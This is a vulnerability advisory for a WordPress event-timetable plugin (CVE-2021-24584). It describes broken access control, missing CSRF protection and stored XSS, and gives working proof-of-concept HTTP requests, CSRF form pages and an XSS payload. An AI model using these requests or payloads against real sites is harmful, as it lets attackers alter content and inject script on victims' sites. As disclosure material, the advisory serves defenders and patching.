WordPress Plugin Vulnerabilities

Timetable and Event Schedule by MotoPress < 2.4.2 - Unauthorised Event TimeSlot Update

Description

The plugin does not have proper access control when updating a timeslot, allowing any user with the edit_posts capability (contributor+) to update arbitrary timeslot from any events. Furthermore, no CSRF check is in place as well, allowing such attack to be perform via CSRF against a logged in with such capability. In versions before 2.3.19, the lack of sanitisation and escaping in some of the fields, like the descritption could also lead to Stored XSS issues

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 191
Connection: close
Cookie: [author+]

controller=events&data%5Bid%5D=2&data%5Bdescription%5D=AttackerDescription&data%5Buser_id%5D=1&data%5Bweekday_ids%5D=1327&mptt_action=update_event_data&action=route_url

Via CSRF:
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="controller" value="events" />
      <input type="hidden" name="data[id]" value="2" />
      <input type="hidden" name="data[description]" value="AttackerDescription" />
      <input type="hidden" name="data[user_id]" value="1" />
      <input type="hidden" name="data[weekday_ids]" value="1327" />
      <input type="hidden" name="mptt_action" value="update_event_data" />
      <input type="hidden" name="action" value="route_url" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


XSS in v < 2.3.19

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 189
Connection: close
Cookie: [authpr+]

controller=events&data%5Bid%5D=2&data%5Bdescription%5D=%3Cimg+src+onerror%3Dalert(%2FXSS%2F)%3E&data%5Buser_id%5D=1&data%5Bweekday_ids%5D=1327&mptt_action=update_event_data&action=route_url

Via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="controller" value="events" />
      <input type="hidden" name="data[id]" value="2" />
      <input type="hidden" name="data[description]" value="<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="data[user_id]" value="1" />
      <input type="hidden" name="data[weekday_ids]" value="1327" />
      <input type="hidden" name="mptt_action" value="update_event_data" />
      <input type="hidden" name="action" value="route_url" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

XSS will be trigged in the frontend when viewing the event, and backend when editing it

Affects Plugins

Plugin icon
mp-timetable
Fixed in 2.4.2

References

CVE
CVE-2021-24584

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
60eadf75-8298-49de-877e-ce103fc34d58

Timeline

Publicly Published
2021-08-23 (about 2 years ago)
Added
2021-08-23 (about 2 years ago)
Last Updated
2022-03-07 (about 2 years ago)

Other

Published
Title
Published
2021-10-01
Title
Stripe For WooCommerce 3.0.0 - 3.3.9 - Missing Authorization Controls to Financial Account Hijacking
Published
2022-01-05
Title
SupportCandy < 2.2.5 - Unauthenticated Arbitrary Ticket Deletion
Published
2023-10-24
Title
Draw Attention < 2.0.16 - Improper Access Control via register_cpt
Published
2021-09-20
Title
WP Import Export Lite < 3.9.5 - Subscriber+ Extensions Update
Published
2021-04-22
Title
Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User